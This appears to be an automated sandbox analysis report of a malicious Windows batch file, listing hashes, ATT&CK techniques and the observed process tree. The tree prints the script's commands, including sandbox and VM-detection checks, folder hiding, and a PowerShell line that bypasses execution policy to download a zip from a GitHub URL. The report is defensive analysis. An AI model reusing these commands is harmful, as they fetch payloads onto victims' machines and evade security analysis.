7944c6a800e3956afceb244e4b58d6368858879cef8d225c0c870646e29405d5

Analysis

max time kernel
120s
max time network
120s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
22/01/2025, 17:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

.bat
Size

35KB
MD5

e0f14d8b4e040e347ac4c68fa65ab34d
SHA1

7792151bebcc851456faf92760e66e63fd9db8b8
SHA256

7944c6a800e3956afceb244e4b58d6368858879cef8d225c0c870646e29405d5
SHA512

cacaaef3f5184ed6a0c2f7655114dabeee7bf5e163d65a1758ba209ceeac97c5d79210fc0c6d1c98ff2ac9c1664ddbbde00f3587af1cc9983d0047a3c3205991
SSDEEP

768:x+R8e3f87iaNQeCOarasWNMb5yMqX/9MFRb:+3UdNQAarapE

Score

8^/10

execution persistence privilege_escalation

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
1692	powershell.exe

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
2580	systeminfo.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
1692	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	2836	WMIC.exe
Token: SeSecurityPrivilege	2836	WMIC.exe
Token: SeTakeOwnershipPrivilege	2836	WMIC.exe
Token: SeLoadDriverPrivilege	2836	WMIC.exe
Token: SeSystemProfilePrivilege	2836	WMIC.exe
Token: SeSystemtimePrivilege	2836	WMIC.exe
Token: SeProfSingleProcessPrivilege	2836	WMIC.exe
Token: SeIncBasePriorityPrivilege	2836	WMIC.exe
Token: SeCreatePagefilePrivilege	2836	WMIC.exe
Token: SeBackupPrivilege	2836	WMIC.exe
Token: SeRestorePrivilege	2836	WMIC.exe
Token: SeShutdownPrivilege	2836	WMIC.exe
Token: SeDebugPrivilege	2836	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2836	WMIC.exe
Token: SeRemoteShutdownPrivilege	2836	WMIC.exe
Token: SeUndockPrivilege	2836	WMIC.exe
Token: SeManageVolumePrivilege	2836	WMIC.exe
Token: 33	2836	WMIC.exe
Token: 34	2836	WMIC.exe
Token: 35	2836	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2836	WMIC.exe
Token: SeSecurityPrivilege	2836	WMIC.exe
Token: SeTakeOwnershipPrivilege	2836	WMIC.exe
Token: SeLoadDriverPrivilege	2836	WMIC.exe
Token: SeSystemProfilePrivilege	2836	WMIC.exe
Token: SeSystemtimePrivilege	2836	WMIC.exe
Token: SeProfSingleProcessPrivilege	2836	WMIC.exe
Token: SeIncBasePriorityPrivilege	2836	WMIC.exe
Token: SeCreatePagefilePrivilege	2836	WMIC.exe
Token: SeBackupPrivilege	2836	WMIC.exe
Token: SeRestorePrivilege	2836	WMIC.exe
Token: SeShutdownPrivilege	2836	WMIC.exe
Token: SeDebugPrivilege	2836	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2836	WMIC.exe
Token: SeRemoteShutdownPrivilege	2836	WMIC.exe
Token: SeUndockPrivilege	2836	WMIC.exe
Token: SeManageVolumePrivilege	2836	WMIC.exe
Token: 33	2836	WMIC.exe
Token: 34	2836	WMIC.exe
Token: 35	2836	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2964	WMIC.exe
Token: SeSecurityPrivilege	2964	WMIC.exe
Token: SeTakeOwnershipPrivilege	2964	WMIC.exe
Token: SeLoadDriverPrivilege	2964	WMIC.exe
Token: SeSystemProfilePrivilege	2964	WMIC.exe
Token: SeSystemtimePrivilege	2964	WMIC.exe
Token: SeProfSingleProcessPrivilege	2964	WMIC.exe
Token: SeIncBasePriorityPrivilege	2964	WMIC.exe
Token: SeCreatePagefilePrivilege	2964	WMIC.exe
Token: SeBackupPrivilege	2964	WMIC.exe
Token: SeRestorePrivilege	2964	WMIC.exe
Token: SeShutdownPrivilege	2964	WMIC.exe
Token: SeDebugPrivilege	2964	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2964	WMIC.exe
Token: SeRemoteShutdownPrivilege	2964	WMIC.exe
Token: SeUndockPrivilege	2964	WMIC.exe
Token: SeManageVolumePrivilege	2964	WMIC.exe
Token: 33	2964	WMIC.exe
Token: 34	2964	WMIC.exe
Token: 35	2964	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2964	WMIC.exe
Token: SeSecurityPrivilege	2964	WMIC.exe
Token: SeTakeOwnershipPrivilege	2964	WMIC.exe
Token: SeLoadDriverPrivilege	2964	WMIC.exe

Suspicious use of WriteProcessMemory 54 IoCs

description	pid	Process	procid_target
PID 2708 wrote to memory of 2812	2708	cmd.exe	31
PID 2708 wrote to memory of 2812	2708	cmd.exe	31
PID 2708 wrote to memory of 2812	2708	cmd.exe	31
PID 2812 wrote to memory of 2832	2812	net.exe	32
PID 2812 wrote to memory of 2832	2812	net.exe	32
PID 2812 wrote to memory of 2832	2812	net.exe	32
PID 2708 wrote to memory of 2724	2708	cmd.exe	33
PID 2708 wrote to memory of 2724	2708	cmd.exe	33
PID 2708 wrote to memory of 2724	2708	cmd.exe	33
PID 2724 wrote to memory of 2716	2724	cmd.exe	34
PID 2724 wrote to memory of 2716	2724	cmd.exe	34
PID 2724 wrote to memory of 2716	2724	cmd.exe	34
PID 2708 wrote to memory of 2940	2708	cmd.exe	35
PID 2708 wrote to memory of 2940	2708	cmd.exe	35
PID 2708 wrote to memory of 2940	2708	cmd.exe	35
PID 2708 wrote to memory of 2576	2708	cmd.exe	36
PID 2708 wrote to memory of 2576	2708	cmd.exe	36
PID 2708 wrote to memory of 2576	2708	cmd.exe	36
PID 2708 wrote to memory of 2116	2708	cmd.exe	37
PID 2708 wrote to memory of 2116	2708	cmd.exe	37
PID 2708 wrote to memory of 2116	2708	cmd.exe	37
PID 2708 wrote to memory of 2804	2708	cmd.exe	38
PID 2708 wrote to memory of 2804	2708	cmd.exe	38
PID 2708 wrote to memory of 2804	2708	cmd.exe	38
PID 2708 wrote to memory of 2836	2708	cmd.exe	39
PID 2708 wrote to memory of 2836	2708	cmd.exe	39
PID 2708 wrote to memory of 2836	2708	cmd.exe	39
PID 2708 wrote to memory of 2596	2708	cmd.exe	40
PID 2708 wrote to memory of 2596	2708	cmd.exe	40
PID 2708 wrote to memory of 2596	2708	cmd.exe	40
PID 2708 wrote to memory of 2580	2708	cmd.exe	42
PID 2708 wrote to memory of 2580	2708	cmd.exe	42
PID 2708 wrote to memory of 2580	2708	cmd.exe	42
PID 2708 wrote to memory of 2588	2708	cmd.exe	43
PID 2708 wrote to memory of 2588	2708	cmd.exe	43
PID 2708 wrote to memory of 2588	2708	cmd.exe	43
PID 2708 wrote to memory of 2964	2708	cmd.exe	45
PID 2708 wrote to memory of 2964	2708	cmd.exe	45
PID 2708 wrote to memory of 2964	2708	cmd.exe	45
PID 2708 wrote to memory of 2960	2708	cmd.exe	46
PID 2708 wrote to memory of 2960	2708	cmd.exe	46
PID 2708 wrote to memory of 2960	2708	cmd.exe	46
PID 2708 wrote to memory of 524	2708	cmd.exe	47
PID 2708 wrote to memory of 524	2708	cmd.exe	47
PID 2708 wrote to memory of 524	2708	cmd.exe	47
PID 2708 wrote to memory of 2252	2708	cmd.exe	48
PID 2708 wrote to memory of 2252	2708	cmd.exe	48
PID 2708 wrote to memory of 2252	2708	cmd.exe	48
PID 2708 wrote to memory of 2540	2708	cmd.exe	49
PID 2708 wrote to memory of 2540	2708	cmd.exe	49
PID 2708 wrote to memory of 2540	2708	cmd.exe	49
PID 2708 wrote to memory of 1692	2708	cmd.exe	50
PID 2708 wrote to memory of 1692	2708	cmd.exe	50
PID 2708 wrote to memory of 1692	2708	cmd.exe	50

Views/modifies file attributes 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
2540	attrib.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2708
- C:\Windows\system32\net.exe
  net session
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2812
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 session
    3⤵
    PID:2832
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c hostname
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2724
- - C:\Windows\system32\HOSTNAME.EXE
    hostname
    3⤵
    PID:2716
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Khbthjfa "
  2⤵
  PID:2940
- C:\Windows\system32\findstr.exe
  findstr /r /i ".*tria.*\.ge"
  2⤵
  PID:2576
- C:\Windows\system32\netsh.exe
  netsh interface show interface
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:2116
- C:\Windows\system32\findstr.exe
  findstr /i "Triage"
  2⤵
  PID:2804
- C:\Windows\System32\Wbem\WMIC.exe
  wmic computersystem get model
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2836
- C:\Windows\system32\findstr.exe
  findstr /i "VirtualBox VMware Hyper-V KVM"
  2⤵
  PID:2596
- C:\Windows\system32\systeminfo.exe
  systeminfo
  2⤵
  - Gathers system information
  PID:2580
- C:\Windows\system32\findstr.exe
  findstr /i "VirtualBox VMware Hyper-V"
  2⤵
  PID:2588
- C:\Windows\System32\Wbem\WMIC.exe
  wmic bios get serialnumber
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2964
- C:\Windows\system32\findstr.exe
  findstr /i "VBOX VMWARE"
  2⤵
  PID:2960
- C:\Windows\System32\Wbem\WMIC.exe
  wmic nic get name
  2⤵
  PID:524
- C:\Windows\system32\findstr.exe
  findstr /i "Virtual"
  2⤵
  PID:2252
- C:\Windows\system32\attrib.exe
  attrib +h "C:\Users\Admin\AppData\Local\Anon" /s /d
  2⤵
  - Views/modifies file attributes
  PID:2540
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -ExecutionPolicy Bypass -Command "try { Invoke-WebRequest 'https://github.com/H8bs0lfVZviVo3nSSXLzzzz/ksawdarsffsff/raw/refs/heads/main/jsxbjJkH.zip' -OutFile 'jsxbjJkH.zip' } catch { Write-Error 'Download failed with error: $_'; exit 1 }"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:1692

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1692-5-0x000000001B780000-0x000000001BA62000-memory.dmp

Filesize
2.9MB

Download
memory/1692-6-0x0000000001DE0000-0x0000000001DE8000-memory.dmp

Filesize
32KB

Download